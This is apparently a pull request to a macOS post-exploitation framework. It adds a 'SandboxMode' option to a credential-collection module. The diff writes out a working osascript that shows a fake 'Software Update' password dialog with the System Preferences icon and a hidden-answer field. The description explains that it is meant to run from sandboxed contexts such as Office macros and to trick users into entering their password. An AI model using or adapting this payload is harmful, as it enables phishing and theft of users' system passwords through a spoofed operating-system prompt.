### PR TITLE
Added 'SandboxMode' to evade Apple Sandbox protection on applescript

### DIFF
--- a/lib/modules/python/collection/osx/prompt.py
+++ b/lib/modules/python/collection/osx/prompt.py
@@ -58,6 +58,12 @@ class Module:
                 'Description'   :   'Switch. List applications suitable for launching.',
                 'Required'      :   False,
                 'Value'         :   ''
+            },
+            'SandboxMode' : {
+                # The 'Agent' option is the only one that MUST be in a module
+                'Description'   :   'Switch. Launch a sandbox safe prompt',
+                'Required'      :   False,
+                'Value'         :   ''
             }
         }
 
@@ -80,7 +86,7 @@ class Module:
 
         listApps = self.options['ListApps']['Value']
         appName = self.options['AppName']['Value']
-
+        sandboxMode = self.options['SandboxMode']['Value']
         if listApps != "":
             script = """
 import os
@@ -94,8 +100,16 @@ print '\\n'.join(choices)
 """
 
         else:
-            # osascript prompt for the specific application
-            script = """
+            if sandboxMode != "":
+                # osascript prompt for the current application with System Preferences icon
+                script = """
+import os
+print os.popen('osascript -e \\\'display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon file "Applications:System Preferences.app:Contents:Resources:PrefApp.icns" with hidden answer with title "Software Update"\\\'').read()
+"""
+
+            else:
+                # osascript prompt for the specific application
+                script = """
 import os
 print os.popen('osascript -e \\\'tell app "%s" to activate\\\' -e \\\'tell app "%s" to display dialog "%s requires your password to continue." & return  default answer "" with icon 1 with hidden answer with title "%s Alert"\\\'').read()
 """ % (appName, appName, appName, appName)


### PR DESCRIPTION
When you use an empire launcher from within a sandboxed application in OSX (for example Office 2016 macros) many of the modules wont work. However, the prompt module can work with some modification to the osascript call. When the SandboxMode option is true, a different osascript is fired which I removed the 'tell app [App Name]' scripts out because you don't have the ability to talk to other applications in the sandbox. It fires a Display Box prompt from the context of the current application with the "System Preferences" icon and text prompting the user to enter their password to update the application.